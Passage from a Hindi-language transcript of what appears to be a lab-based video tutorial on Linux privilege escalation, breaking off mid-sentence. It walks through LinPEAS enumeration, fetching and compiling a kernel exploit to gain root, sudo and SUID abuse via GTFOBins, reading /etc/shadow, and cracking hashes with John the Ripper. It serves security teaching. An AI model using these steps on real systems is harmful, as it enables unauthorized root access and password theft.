कंसोल। देन ब्लू में आपको पता लगाएगा कि यूजर विदाउट कंसोल है माउंटेड टेब्स। ग्रीन के अंदर कॉमन थिंग्स लाइक यूजर ग्रुप्स SUID SCID एंड ऑल। देन लाइट मेजेंटा कलर में योर यूजर नेम। सो स्टार्टिंग के अंदर बेसिक इंफॉर्मेशन इसने अभी फाइंड आउट किया, लाइक लिनक्स वर्जन जिसको इसने रेड येलो के अंदर हाईलाइट कर रखा है। दैट्स मीन यहाँ पे इस चीज की वनरेबिलिटी है आपके। देन GCC वर्जन 4.8.2 विच इज ऑल्सो वनरेबल। सो एक बार इसको कंप्लीट होने देते हैं। कंप्लीट होने के बाद चेक करते हैं क्या क्या इन्फॉर्मेशन ये निकाल लेता है। आपको सिर्फ यहाँ पे अपलोड करके सिर्फ इसको एग्जीक्यूट कर देना है। सो लेट्स वेट। सो इन्फॉर्मेशन गैदर होने के बाद देखते हैं कुछ वनरेबिलिटीज ये सजेस्ट करते हैं। सो यस, एग्जीक्यूटिंग लिनक्स एक्सप्लोइट सजेस्टर। सो ये भी आपकी एक ऑटोमेशन के लिए आता है जिससे आप सेपरेटली भी रन कर सकते हैं। फॉर एग्जांपल यहाँ पे डर्टी काउ की वनरेबिलिटी है। सो CVE 2016-5195। सो आप डर्टी काउ के थ्रू भी आप एक्सप्लोइट कर सकते हैं। डर्टी काउ 2 ओवरलैप स्पॉनकिट sudo baron samedit 2 DCCP ऐसे करके आपके पास n नंबर ऑफ एक्सप्लॉइट्स अवेलेबल है जिसके थ्रू आप प्रिविलेज एस्केलेशन कर सकते हैं। सो इस स्क्रिप्ट के थ्रू हम सिर्फ ये चेक कर रहे हैं कि जो भी कंपोनेंट है वो हमें सिर्फ स्क्रिप्ट के थ्रू एक बार में ही आपको मिल जाए। आप चाहो तो आप इसे मैनुअली भी ट्राई कर सकते हैं, बट ऑब्वियसली टाइम सेविंग के लिए हम लोग ऑटोमेटेड यूज़ लेते हैं। सो आप इसके लिए लिनपीस यूज़ में ले सकते हैं। लिनपीस के अलावा मल्टीपल टूल्स है। फॉर एग्जांपल अगर आप एनिमेशंस के लिए देख रहे हैं सो वन मोर लेनएनम। आप इसके थ्रू भी एग्जीक्यूट करके अपने एनिमेशन को ऑटोमेटेड कर सकते हैं। इसके अलावा है आपके पास लिनक्स एक्सप्लॉइट सजेस्टर जो भी हम लोगों ने देखा अभी, जो कि लिनपीस के अंदर ही इंक्लूड आता है, जो कि आपको सीवी के साथ बता देता है कि कौन कौन सी वनरेबिलिटीज है या फिर मिस कॉन्फ़िगरेशन है जिसको आप एक्सप्लॉइट कर सकते हैं। देन आपके पास आता है लिनक्स स्मार्ट एनिमरेशन। सेम एनिमरेशन भी आपके वही वर्क कर रहा है। एंड आप यूज में ले सकते हैं लिनक्स प्रिविलेजेशन चेकर। लिनक्स प्रिविलेज चेकर। सो आपको जो भी स्क्रिप्ट अच्छी लगती है जिसका आपको यूआई इजीली समझ में आता है, आप उनके बेसिस पे आप लोग इसे ऑटोमेटेड कर सकते हैं आपके एनिमेशन को। सो
ये था आपका सिंपल पार्ट लिनपीस एनिमेशन का। नेक्स्ट पार्ट में हम लोग देखेंगे कि जो भी हमको ये वल्नरेबिलिटीज मिली है या जो भी हमको इन्फॉर्मेशन मिली है इसके थ्रू आप एक्सप्लोइट कैसे कर सकते हैं। फॉर एग्जांपल अगर मुझे डर्टी काउ से करना है, डर्टी काउ 2 से करना है, सो ये सभी मैं कैसे एक्सप्लोइट कर सकता हूँ। सो एनिमेशन यहाँ पे कंप्लीट हो गया है। कर्नल एक्सप्लॉइट्स। सो एनिमेशन के टाइम पे जब हमने मैनुअल एनिमेशन किया था, सो हमने कमांड देखी थी यूनेम। सो यूनेम हाइफन ए करके हमें कर्नल से रिलेटेड हमें इंफॉर्मेशन मिली थी कि कर्नल का जो वर्जन था विच इज़ 3.13.0 हाइफन 24। सो ऐसे करके हमें इंफॉर्मेशन मिली थी कर्नल से रिलेटेड। देन हमने ऑटोमेटेड एनिमेशन के अंदर लेंटिस से भी देखा था कि कर्नल एक्सप्लॉइटेबल है। सो अभी हम लोग ट्राई करेंगे कर्नल एक्सप्लॉइटेशन से रिलेटेड। सो मैं यहाँ पे सर्च एक्सप्लॉइट यूज में ले लेता हूँ, सर्च एक्सप्लॉइट। एंड देन आप यहाँ पे सर्च कर सकते हैं लाइक लिनक्स कर्नल एंड जो भी आपका वर्जन था। सो फॉर एग्जांपल 3.13। सो 3.13 में सर्च एक्सप्लोर करता हूँ तो यहाँ पे मुझे मल्टीपल ऑप्शंस आ जाते हैं। लाइक SCID प्रिविलेज एस्केलेशन मुझे मिल रहा है, ओवरले फिस लोकल प्रिविलेज एस्केलेशन। सो हम लोगों ने कल मतलब लास्ट वीडियो के अंदर जो देखा था, सो लास्ट वीडियो में हमने आइडेंटिफाई किया था कि यहाँ पे डर्टी काउ 2 और ओवरले फेस करके हमें वनरेबल था। सो अभी हम क्या करते हैं, ये ओवरले फेस का ही एक्सप्लॉइट डाउनलोड करते हैं और इसको डाउनलोड करके एग्जीक्यूट करके देखते हैं और जो लोकल प्रिविलेज एस्केलेशन है उसको रन करते हैं। सो एक्सप्लॉइट को डाउनलोड करने के लिए मुझे इसकी पाथ चाहिए। सो मैं इसकी पाथ को कॉपी कर लेता हूँ, कॉपी एंड देन अगेन सर्च एक्सप्लॉइट। सो पहले मैं इसको mkdir लोकल प्रिविलेज एस्केलेशन ओके एंड सर्च एक्सप्लॉइट हाइफन m एंड देन जो भी आपने पाथ कॉपी किया था देन एंटर। सो यहाँ पे मेरा कॉपी हो चुका है डाउनलोड्स के अंदर, LP के अंदर 37292.c। अब हमें ये एक्सप्लॉइट को हमारे टारगेट मशीन के अंदर सेंड करना है। सो टारगेट मशीन के अंदर जैसे हमने लिनपीस डाला था पाइथन का सर्वर क्रिएट करके, सेम वही प्रोसेस यूज में लेंगे। एंड हम लोगों ने ये भी देखा था कि इसके अंदर आपके GCC इनेबल था जिसके थ्रू सी कोड को आप कंपाइल कर सकते हो। सो मैं सिंपल CD TMP करता हूँ। सो मैं भी टेम्प फोल्डर के अंदर हूँ। आपको अगेन चेक करने के लिए आप टच कमांड करके कोई फाइल क्रिएट कर सकते हैं लाइक दिस। सो यहाँ पे मैं फाइल क्रिएट कर सकता हूँ। नाउ यहाँ पे आपको सिर्फ डुप्लीकेट करके आपको IP और आपका पासवर्ड रखना है। बट उससे पहले मैं यहाँ पे अपना सर्वर एक क्रिएट कर लेता हूँ और इस फाइल को मैं एक बार रिनेम कर लेता हूँ। सो exploit.c कर लेता हूँ इसे, ओके, ताकि डाउनलोड करने में आसानी हो। नाउ python -m http.server and port number anything 12345। meanwhile my IP, so my IP is 10.17.51.213। मैं इसे कॉपी कर लेता हूँ एंड देन wget http IP port number 12345 and then exploit-c एंटर। exploit-c करता हूँ। सो अब मैं टारगेट मशीन के अंदर मेरा एक्सप्लोइट यहाँ पे डाउनलोड हो चुका है। जैसे एलिस करके मैं देखता हूँ exploit-c। नाउ इस एक्सप्लोइट को मुझे कंपाइल करना है ताकि जो भी मेरा सी का प्रोग्राम है वो आउटपुट करके एक फाइल बना दे जिसको मैं एग्जीक्यूट कर सकूं। सो सिंपली मैं यहाँ लिखता हूँ GCC exploit.c एंड देन -o, जो भी आप नाम रखना चाहते हो, exploit1
करके इसका नाम रख लेते हैं, या एक्सप्लोइट करके नाम रख लेते हैं। सो जीसीसी एक्सप्लोइट हाइफन सी हाइफन ओ फॉर आउटपुट। सो कंपाइल करके जो आउटपुट की फाइल आएगी वो होगी आपकी एक्सप्लोइट नाम से। लेट्स वेट। ओके डन। एलिस करते हैं। सो यू कैन सी आपके पास यहाँ पे एक्सप्लोइट करके आपके पास फाइल क्रिएट हो गई है। अब आपको सिर्फ इसको एग्जीक्यूट करना है। सो एग्जीक्यूट करने के लिए मैं यहाँ पे डॉट स्लैश एंड देन एक्सप्लोइट, एंटर। एंटर करते ही आप देखोगे पहले आप डॉलर के साइन पे थे, मीन आप नॉर्मल यूजर पे थे। नाउ अभी आप हैश साइन पे आ गए हो, दैट्स मीन यहाँ पे आपने रूट का एक्सेस ले लिया है। फॉर एग्जाम्पल अगर मैं यहाँ पे लिखता हूँ आईडी, सो आईडी में अब आप देख सकते हैं यू आई डी जीरो रूट करके, दैट्स मीन आपने लोकली प्रिविलेज एस्केलेशन कर लिया है थ्रू दिस वल्नरेबिलिटी, और आपने जो कर्नल का वर्जन था वो आइडेंटिफाई किया एन्यूमरेशन के टाइम पे, और मैनुअली एक्सप्लॉइट डाउनलोड किया आपने सर्च एक्सप्लॉइट की हेल्प से, एंड देन सर्च एक्सप्लॉइट को करके आपने पाइथन की हेल्प से यहाँ पे ट्रांसफ़र किया, एंड देन जीसीसी की हेल्प से आपने आपके सी प्रोग्राम को रन किया और यहाँ पे आपने इसको एग्जीक्यूट करवा दिया, एंड सिंपली आपने यहाँ पे प्रिविलेज एस्केलेशन कर्नल एक्सप्लोइटेशन कर लिया है, विच इज एक्सप्लोइटेशन ऑफ सूडो। इससे पहले हमने देखा था एन्यूमरेशन ऑटोमेटेड टूल्स से एन्यूमरेशन, देन कर्नल एक्सप्लोइट, और आज देखने वाले हैं सूडो के बारे में। सो एन्यूमरेशन के टाइम पे हमने ये भी देखा था कि अगर आपको फाइंड आउट करना है, एन्यूमरेट करना है कि सूडो से रिलेटेड कौन कौन सी सर्विसेज चल रही है, सो यू कैन यूज सूडो हाइफन एल। Now, so why sudo command? So by default, like sudo command allows you to run a program with a root privilege. यहाँ पे आपको डायरेक्ट रूट प्रिविलेज के साथ आपको परमिशंस मिल जाती है sudo की हेल्प से। सो कई बार होता है जो भी एडमिनिस्ट्रेटर होता है बाय डिफॉल्ट सूडो को इनेबल कर देता है कि ये इन सर्विसेज के साथ या फिर इन प्रोसेसेस के साथ आप सूडो डायरेक्टली रन कर सकते हो विदाउट एनी पासवर्ड। सो उसके लिए मैं यहाँ पे यूज़ ले रहा हूँ सूडो हाइफन एल। सो सूडो हाइफन एल करके मैं जैसे ही यहाँ पे एंटर करता हूँ, सो सूडो हाइफन एल करने पे मेरे पास आता है कि हाँ मैचिंग डिफॉल्ट एंट्रीज फॉर कैरन, जो कि मशीन का नाम है, देन आईपी, एनवायरनमेंट रीसेट मेल, एंड देन द फॉलोइंग कमांड्स। मेन आपकी फाइंड कमांड, लेस कमांड और नैनो कमांड। दैट्स मीन कि आपकी फाइंड, लेस और नैनो ये जो तीन प्रोसेस है या फिर तीन कमांड है जिनको आप बाय डिफॉल्ट सूडो की हेल्प से, मतलब एज ए सूडो मेन एज ए रूट यूज़र आप इसको रन कर सकते हैं। नाउ इसको एक्सप्लोइट कैसे किया जाए, क्योंकि अगर मैं यहाँ पे देखता हूँ आईडी, सो यहाँ पे मैं अभी नॉर्मल यूज़र हूँ कैरन करके। नाउ इसके लिए आपको एक वेबसाइट ओपन करनी है जो कि आपके लिए बहुत यूज़फुल है। द वेबसाइट इज़ GTFO बिन्स। सो आप गूगल करते हैं तो gtfobins.github.io करके आपको वेबसाइट मिलेगा जहाँ पे आपको मल्टीपल एक्सप्लोइटेशन से रिलेटेड हर चीज़ मिल जाएगी। सो फॉर एग्जांपल मुझे फाइंड कमांड से रिलेटेड देखना है, सो मैं यहाँ पे फाइंड सर्च करता हूँ। अब फाइंड में आपको क्या फंक्शन चाहिए, मेन आपको शेल एक्सेस चाहिए, SUID एक्सप्लोइटेशन, या फिर सूडो। सो फॉर एग्जांपल मैं सूडो पे जाता हूँ। सो सूडो में मुझे बताता है कि आप ये वाली कमांड एग्जीक्यूट कर लो, और एग्जीक्यूट करने के बाद आप डायरेक्ट इसमें रूट यूज़र बन जाते हैं। लाइक अगर आप SUID को एक्सप्लोइटेशन करना चाहते हैं, विच इज़ आवर नेक्स्ट वीडियो, सो आप यहाँ पे SUID यूज़ ले सकते हैं, और शेल के लिए सिंपल कमांड। सो यहाँ पे मैंने ये कमांड कॉपी कर लिया, एंड देन टर्मिनल पे जाके सो सी अभी मैं नॉर्मल यूज़र हूँ, कैन सी द डॉलर साइन। सो राइट क्लिक एंड देन पेस्ट। पेस्ट में मैंने सूडो फाइंड किया, देन डॉट एग्जीक्यूट करता हूँ बिन एसएच, एंड देन क्विट, एंटर। सो आप देख सकते हैं मेरा डॉलर हैश के अंदर कन्वर्ट हो गया है। मेन मैं नॉर्मल यूज़र से रूट यूज़र बन चुका हूँ। सो फॉर एग्जांपल अगर मैं यहाँ पे आईडी करता हूँ, सो यू कैन सी माय UID इट्स 0, दैट्स मीन मेरे पास अभी रूट की परमिशंस है। हु एम आई करके वेरीफाई कर लेते हैं। सी रूट, मैं यहाँ से एग्जिट करता हूँ, सो मैं यहाँ से रूट से एग्जिट हो चुका हूँ। नाउ आईडी, अभी आप देख सकते हैं मैं वापस से नॉर्मल यूज़र आ गया हूँ, हु एम आई, एंड देन नॉर्मल यूज़र। सो दिस इज़ द बेसिक फंडामेंटल जहाँ पे आप परमिशंस को चेक करते हैं, और उन परमिशंस के बेसिस पे आप GTFO बिन्स वेबसाइट पे जाके सर्च करके देख सकते हैं। फॉर एग्जांपल अगर मुझे इसको नैनो से करना होता, सो मैं यहाँ पे नैनो करता हूँ, देन नैनो, देन यहाँ पे सूडो।
सूडो पे मुझे यहाँ पे बताता है कि सूडो नैनो एंड देन ये कोड मुझे पूरा एग्जीक्यूट करना है। उसके बाद डायरेक्ट मेरे पास मैंने सूडो को लाइक प्रिविलेज एस्केलेशन कर लूंगा और मैं नॉर्मल यूजर से रूट यूजर की परमिशंस पे आ जाऊंगा। एज सिंपल एज दैट। But before starting SUID exploitations, we'll discuss about the Linux permissions. कि Linux permissions होती क्या है, like SUID, SGID and sticky bit के बारे में थोड़ा सा हम लोग देखते हैं कि कैसे वर्क करती है। So आपने Linux के अंदर ls-la कमांड यूज में लिया ही होगा, जो कि आपको बताता है कि आप उसको लिस्ट में देखते हो, जहाँ पे आपको बताता है कि कौन सी फाइल को क्या परमिशंस है। मेन यहाँ पे आपके 3 ग्रुप क्रिएटेड है। सो स्टार्टिंग के कैरेक्टर्स आपके डिफाइन करते हैं कि ये आपकी डायरेक्टरी है, आपका लिंक है, या फिर आपका फाइल है। फॉर एग्जांपल डी एंड हाइफन, या फिर आपके यहाँ पे कई बार एल भी आता है। देन आर डब्ल्यू एक्स, आर हाइफन एक्स एंड हार हाइफन एक्स, जो कि 9 आपके कैरेक्टर है सिक्योरिटी, वो हम डिस्कस करते हैं। यहाँ पे आपके आपके शो करता है कि ओनर कौन है, देन ग्रुप कौन है जिनको स्पेशल परमिशंस मिली हुई है, टोटल साइज क्या है। टोटल साइज के बाद आता है आपके फाइल इन बाइट और मॉडिफाई कब हुई थी, एंड मॉडिफाई के बाद आपको ऑब्वियसली लास्ट में आपके फाइल नेम या फिर आपके डायरेक्टरी नेम। सो इनको स्पेसिफिक तरीके से देखते हैं। सो जैसे आप देख सकते हैं DRWXR-X। सो इसको अगर कैटेगराइज करते हैं, सो दैट्स मीन आपके हाइफन स्टैंड्स फॉर फाइल, डी स्टैंड्स फॉर डायरेक्टरी एंड एल स्टैंड्स फॉर लिंक। सो आप इजीली आइडेंटिफाई कर सकते हैं यहाँ से देख के कि हाइफन डी और एल से कि फाइल है, डायरेक्टरी है, या फिर आपकी लिंक है। देन आपके 9 कैरेक्टर्स डिफाइन करते हैं आपके रीड, राइट एंड एग्जीक्यूट। मेन आर स्टैंड्स फॉर रीड, डब्ल्यू स्टैंड्स फॉर राइट एंड एक्स स्टैंड्स फॉर एग्जीक्यूट। नाउ 3-3 के पेयर में आपके 3 ग्रुप्स में बटे हुए हैं। फर्स्ट ग्रुप है ओनर, सेकंड ग्रुप है ग्रुप एंड थर्ड है यूजर या फिर अदर्स का। जैसे कि एक तो हो गया आपके रूट परमिशंस के साथ, सो आपके ओनर हो गया। देन एक ग्रुप परमिशंस के साथ जिनको स्पेशल परमिशंस मिली हुई है, और एक सिंपल यूजर परमिशन। सो फॉर एग्जांपल अगर मैं फर्स्ट वाली फाइल की फर्स्ट वाली डायरेक्टरी देखता हूँ, सो यहाँ पे मुझे रीड और एग्जीक्यूट की परमिशंस है इन यूजर ग्रुप में, इन यूजर एंड ग्रुप के अंदर मुझे परमिशंस मिली हुई है रीड और एग्जीक्यूट की, सेम एज यूजर। एंड रूट के साथ मुझे मिला हुआ है रीड, राइट एंड एग्जीक्यूट। मीन मेरे पास फुल परमिशन है कि एज अ रूट में इस फाइल के अंदर पूरे चेंजेस कर सकता हूँ। नाउ इसको और समझने के लिए हम लोग देखते हैं इसका सिंबॉलिक मेथड। सो सिंबॉलिक मेथड में हम लोग यूज में लेते हैं CH मोड। मीन चेंज मोड मतलब कि आप परमिशंस चेंज कर रहे होते हैं। सो हु, व्हाट और विच, और जिसकी ये फाइल है। सो हु रिप्रेजेंट करता है आपको कि आप यूजर का, ग्रुप का, या फिर अदर का, ऑल का। सो उन्हीं के बेसिस पे आपके ऑप्शन है UGOA। देन व्हाट, आप क्या चेंज करना चाहते हैं। सो यहाँ पे आप स्पेसिफाई कर सकते हैं कि ऐड, रिमूव और सेट एक्सेप्ट एंड विच, कौन सा। मेन आपको रीड की परमिशंस देनी है, राइट की परमिशंस देनी है, या फिर एग्जीक्यूट की परमिशंस देनी है। सो फॉर एग्जांपल CH मोड UZ प्लस RW एंड देन फाइल डॉट TXT, जहाँ पे U और G आपको बता देता है कि आप यूजर और ग्रुप का चेंज करना चाहते हो, ऐड कर रहे हो जिसपे रीड और राइट की परमिशंस, और फाइल का नाम है फाइल डॉट TXT। आपने और एग्जांपल्स देखे होंगे, तो इसको और थोड़ा इजी कर देते हैं विद द हेल्प ऑफ न्यूमेरिक मेथड्स। सो न्यूमेरिक मेथड्स में आप समझ जाएंगे। सो जैसे जीरो की वैल्यू यहाँ पे 000 है, जिसमें 1 ऐड करता हूँ तो 1, देन 1 ऐड करते हैं तो बाइनरी के अंदर 10, देन 11, देन 100, 101, 110 एंड 111। सो यहाँ के बेसिस पे भी हो सकता है। नाउ अगर मैं जीरो की बात करता हूँ, सो मेन यहाँ पे अभी मुझे कोई परमिशंस नहीं है। अगर 1 की बात करता हूँ, सो यहाँ पे मुझे सिर्फ एक एग्जीक्यूट की परमिशंस दे रही है, दैट्स मीन 001। देन 2 में हाइफन W हाइफन। सो ऐसे सोन आपकी ये टेबल क्रिएटेड है। नाउ अगर मैं हाइफन हाइफन करता हूँ, दिस इज नन एग्जीक्यूट। देन नंबर 2 फॉर राइट, नंबर 3 फॉर राइट एंड एग्जीक्यूट, नंबर 4 फॉर रीड, नंबर 5 फॉर रीड एंड एग्जीक्यूट, नंबर 6 रीड एंड राइट, नंबर 7 रीड, राइट एंड एग्जीक्यूट। तो आपने बहुत बार देखा होगा कि फुल परमिशंस देने के लिए आप लोग यूज में लेते हैं CH मोड।
एंड देन 777, दैट्स मीन आपको रीड राइट और एग्जीक्यूट की यहाँ पे परमिशंस हो गई। सो ये तो था बेसिक परमिशंस लिनक्स परमिशन सिस्टम। बट स्पेशल परमिशन सिस्टम्स में होता क्या है, जहाँ पे हम लोग डिफरेंट डिफरेंट टाइप की चीज़ें देखते हैं। सो स्पेशल परमिशंस के अंदर आता है आपका फोर्थ एक्सेस लेवल, जो कि आपको ऐड कर देता है परमिशंस यूजर के, ग्रुप की और अदर की। जो भी आपकी स्पेशल परमिशंस होती है वो डिपेंड्स करती है उनके प्रिविलेज पे, उनके स्टैंडर्ड परमिशन सेट्स पे, जैसे कि इनके नाम दिए हुए। सो फर्स्ट ऑफ ऑल आता है अपना एस यू आई डी। सो इसको डिवाइड कर देते हैं कि यूजर प्लस एस मेन आपकी स्पेशल परमिशंस है। सो एस यू आई डी जहाँ पे आपको रूट के अंदर सारी इंफॉर्मेशंस मिलती है एक्सेस लेवल की, जहाँ पे आप डायरेक्टली उन परमिशंस को एक्सेस कर सकते हैं। So a file with SUID always execute as the user who owns the file. So इसका हम लोग एक एग्जाम्पल देख लेते हैं। So एग्जाम्पल देखने के लिए मैं यहाँ पे सिंपल मेरा काली लिनक्स ऑन कर लेता हूँ। सो इसके एग्जाम्पल के लिए जैसे यूज़र बिन पासवर्ड जो फाइल है वो आपके आपके SUID आती है। सो फॉर एग्जाम्पल अगर मैं CD डाउनलोड्स डॉक्यूमेंट्स करता हूँ और LA करता हूँ यहाँ पे, सो यू कैन सी DRWXR, यहाँ पे आपको यही सारी चीज़ें शो हो रही है। मैंने आपको यहाँ पे स्पेशल परमिशंस नहीं मिल रही है। बट सेम चीज़ को मैं अगर यहाँ पे लिखता हूँ LS-LA यूज़र बिन पासवर्ड, यहाँ पे मैं एंटर करता हूँ। सो यू कैन सी RWSR, यहाँ पे जो आपको परमिशंस है वो आपको स्पेशल परमिशंस मिली हुई है, इसलिए यहाँ पे आपको S करके शो कर रहा है। जबकि आप पहले वाले देखोगे तो यहाँ पे आपको ऐसा कुछ लिखा हुआ नहीं आता। दैट्स मीन यहाँ पे आप आइडेंटिफाई कर सकते हैं कि स्पेशल परमिशंस क्या है इसकी। सो यूजर बिन पासवर्ड आपकी स्पेशल परमिशंस के साथ आता है फॉर द SUID। सेम चीज अगर मैं SGID के बारे में देखता हूँ, सो सेम ऐसे ही आपके शो करता है, जहाँ पे आपको भी नोट कर देगा। एंड थर्ड होता है आपका स्टिकी बिट्स। सो स्टिकी बिट्स आप लोग ने बहुत बार कॉमनली देखा होगा कि हम लोग सारी चीज़ें टेम्प के अंदर ही कर रहे होते हैं। तो टेम्प के अंदर करने का कारण क्या होता है? सो फॉर एग्जांपल जैसे मैं यहाँ पे LS-LA एंड देन TMP। सो आप TMP के अंदर देखते हो तो यहाँ पे आपको स्टिकी का T यहाँ पे आपको शो कर देता है। दैट्स मीन ये जो आपका फोल्डर है ये आपके स्पेशल परमिशंस के है, जो कि स्टिकी बिट्स के बेसिस पे है। सो नेक्स्ट करके देख लेते हैं जहाँ पे आपको इजीली समझ में आ जाएगा। सो फर्स्ट है आपका RWS, तो यहाँ पे आपको SUID करके शो कर देगा। एंड सेकंड है RWS, जहाँ पे आपको ग्रुप के अंदर GUID शो कर देगा। एंड थर्ड है आपका RWT, जहाँ पे आपको स्टिकी बिट शो कर देता है। तो अगर आपको इस टाइप की परमिशंस दिखती है, दैट्स मीन ये आपका फोर्थ एक्सेस लेवल है परमिशंस का, जो कि इनको स्पेशल परमिशंस मिली हुई है, इधर SUID, GUID और स्टिकी बिट। सो दिस इज द सिंपल फॉर लिनक्स परमिशंस। नाउ एक्सप्लोइट करते हैं अब हम लोग SUID को, जो कि हमारा कंटिन्यू सीरीज रन हो रखी थी। सो हमने लास्ट मशीन में भी देखा था। सो यहाँ पे मैं आपको OMI करके बता देता हूँ। सो यहाँ पे मुझे यूज़र का नाम दिख रहा है कैरन करके। नाउ अब हमें आइडेंटिफाई करना है फॉर SUID। सो उसके लिए मैं एक कमांड यूज में लेता हूँ, फाइंड फॉर रूट एंड देन टाइप F एंड देन हाइफन परमिशंस। नाउ आपके पास यहाँ पे दो ऑप्शंस होते हैं परमिशंस को आइडेंटिफाई करने के लिए, या फिर कि आपको क्या है इनपुट डालना है। सो आप हाइफन परमन लाइक फॉर परमिशंस के लिए आप यहाँ पे एक नंबर भी दे सकते हैं, लाइक 04 एंड देन 000 फॉर SUID, या फिर आप यहाँ पे सिंपल हाइफन U इक्वल टू S भी लिख सकते हैं, जो कि हमने अभी देखा था S स्टैंड करता है आपके SUID के लिए।
सो दोनों में आपका आउटपुट सेम ही आएगा। सो यू कैन यूज़ हाइफन ए इक्वल टू एस। और क्योंकि ज़्यादा इजी है, अगर आपको GUID के बारे में देखना है या फिर आपको स्टिकी बिट्स के बारे में देखना है तो यहाँ पे आपको सिर्फ नोट का ये नोटेशन चेंज करना है। सो यहाँ पे मैं लिखता हूँ हाइफन यू इक्वल टू एस एंड देन हाइफन एलएस, अगर आप ये लगाना चाहते हो तो। अदरवाइज आपके पास सीधा आउटपुट आ जाएगा। मैं आपको दोनों करके दिखा देता हूँ। एंड देन एरर हैंडलिंग के लिए मैं यहाँ पे ले लेता हूँ टू टेप एंड देन नल एंटर। सो यहाँ पे मेरे पास आउटपुट आने चालू हो गया है, क्योंकि ये पूरा रूट डायरेक्टरी के अंदर सर्च कर रहा है। यू कैन सी द स्लैश द परमिशंस और SUID। सो यहाँ पे स्नैप स्नैप करके आ रहा है। इन स्नैप को हम लोग इग्नोर कर देते हैं अभी के लिए। देन यूजर लिप DBUS, एक हेल्पर, यूजर लिप ओपन SSH SSN कीज एंड यूजर लिप polycat polycate -1 agent helper and then user lib eject user lib snap confine। सो वेट करते हैं एक बार वो, या फिर जो ये यूजर्स है, लाइक फॉर एग्जांपल ये जो परमिशंस है जो इनको मिली हुई है, ये सभी आपको SUID परमिशंस के बेसिस पे है जिनको आप एक्सप्लोर कर सकते हैं। सो इसके लिए मैं ब्राउज़र ओपन कर लेता हूँ, और जैसे लास्ट वीडियो में हमने एक वेबसाइट देखी थी विच इज़ GTFO wins.github.io, जहाँ पे आपको सभी SUID सूडो कर्नल एक्सप्लोइटेशन से रिलेटेड आपको कोड मिल जाता है। सो यहाँ पे सर्च के अंदर आपको जो भी मिल रहा है, जैसे फॉर एग्जांपल यूजर बिन बेस 64। सो बेस 64 के बारे में अगर मुझे सर्च करना है, सो मैं यहाँ पे लिखता हूँ बेस 64। सो बेस 64 में मुझे बता देता है कि आपको फाइल रीड का देखना है, SUID का या सूडो का। सो ऑब्वियसली मैं अभी SUID ही देख रहा हूँ। सो SUID के अंदर मैं देखता हूँ तो यहाँ पे मुझे बताता है कि आप L फाइल करके यहाँ पे एक वेरिएबल है, देन फाइल टू रीड, जो आपको फाइल रीड करनी है बेस 64 के अंदर, एंड देन वो उसको डिकोड करके यहाँ पे आपको शो करता है। सो हाँ, इसके एक्सप्लोटेशंस के लिए हम लोग ट्राई करते हैं कि कैसे आप एक शेडो फाइल में से और कैसे आप ETC पासवर्ड में से दोनों को कंबाइन करके आप किसी यूज़र की पासवर्ड को आइडेंटिफाई कर सकते हैं। फॉर एग्जांपल अगर बेस 64 यहाँ पे ओपन है तो। सो मैं यहाँ पे सो यहाँ पे मैं करता हूँ गेट ETC शेडो। यहाँ पे मेरे पास अभी परमिशन डिनाइड है। मैं यहाँ करता हूँ गेट ETC एंड देन पासवर्ड। सो यहाँ पे मुझे एक फाइल मिलती है एंड देन यहाँ पे मुझे मल्टीपल यूजर्स दिख रहे हैं, जैसे कि एक मुझे दिखा user2 करके। एंड देन शेडो फाइल का मेरे पास अभी एक्सेस नहीं है, बट SUID की हेल्प से हम लोग उसको एक्सेस करने का ट्राई करते हैं। सो इसके लिए मैं CD TMP में आ जाता हूँ एंड देन यहाँ पे सिंपल लिखता हूँ L फाइल इक्वल टू, जो मुझे फाइल रीड करनी है, मेन ETC पासवर्ड, सॉरी ETC शेडो। पासवर्ड तो हम लोग डायरेक्टली भी देख सकते हैं। सो ETC शेडो, क्योंकि यहाँ पे हमारे पास परमिशंस नहीं है, सो ETC शेडो करके एंटर कर देता हूँ। नाउ कोड कॉपी करता हूँ, देन पेस्ट। ओके, सो डॉट स्लैश हटा के इसको डायरेक्ट एग्जीक्यूट करते हैं, पेस्ट क्लिपबोर्ड एंड एंटर। जैसे एंटर करता हूँ, नाउ यू कैन सी यहाँ पे आप शेडो फाइल को डायरेक्टली देख सकते हो, एक्सेस कर सकते हो। दैट्स मीन जो SUID है हमने उसका लाइक एस्केलेशन किया है परमिशंस का। हमारे पास नॉर्मल परमिशंस थी लेकिन शेडो फाइल स्पेशल परमिशन थी, देन हमने बेस 64 की हेल्प से उसको एक्सक्लूड किया। सो यहाँ पे फॉर एग्जांपल मुझे user2 यहाँ पे शो कर देता है। सो मैं इसको कॉपी करके रख लेता हूँ एंड एक न्यू टैब करके, जो कि मेरा ही सिस्टम है, यहाँ पे भी मैं टेम्प फोल्डर के अंदर चले जाते हैं एंड देन टच shadow.txt nano shadow.txt, मैं यहाँ पे इसको पेस्ट कर देता हूँ,
कंट्रोल ओ, एंटर, कंट्रोल एक्स फॉर एग्जिट। एंड देन यहाँ पे हमने देखी थी गेट etc पासवर्ड। सो etc पासवर्ड में मेरे पास ये आ जाता है, मैं इसे कॉपी कर लेता हूँ। एंड देन नैनो पासवर्ड डॉट txt और मैं इसे यहाँ पे पेस्ट कर देता हूँ। कंट्रोल O for save, then control S exit. Now we have two files, the password.txt and the shadow.txt. अब इनको कंबाइन करने के लिए हमें कमांड यूज में लेते हैं विच इज unshadow. सो मैं यहाँ लिखता हूँ unshadow एंड देन यहाँ पे लिखूंगा मैं पासवर्ड वाली फाइल एंड देन शेडो फाइल एंड देन इसको मैं एक सेव कर रहा हूँ फॉर एग्जाम्पल len.txt। देन यहाँ पे मेरी ये फाइल कंबाइंड हो चुकी है। नाउ इसके अंदर जो पासवर्ड है वो मुझे करेक्ट करने हैं, सो विद द हेल्प ऑफ जॉन मैं उसको कर सकता हूँ। सो मैं यहाँ लिखता हूँ जॉन एंड सॉरी वर्डिस्ट इक्वल होम खाली जहाँ पर भी आपकी rock.txt फाइल रखी हुई है एंड देन आपकी फाइल का नाम विच इज len.txt एंटर। सो यहाँ पे आपका लोड हो चुका है और नो पासवर्ड हैशेस लेफ्ट टू क्रिएट। सो यहाँ पे इसके बाद में जब मुझे पासवर्ड चेक करना होगा सो जॉन हाइफन शो एंड देन फाइल का नाम एंड देन एंटर। सो यहाँ पे आप देख सकते हैं मेरे यूजर 2 का पासवर्ड है पासवर्ड 1 करके। सो इस बेसिस पे आप इजीली SUID एक्सप्लॉइटेशंस को एग्जीक्यूट कर सकते हैं। सो SUID सिंपल है, मैंने आपको बेसिक से क्लियर किया है कि आपकी कैपेबिलिटीज क्या क्या होता है। सो फॉर एग्जांपल 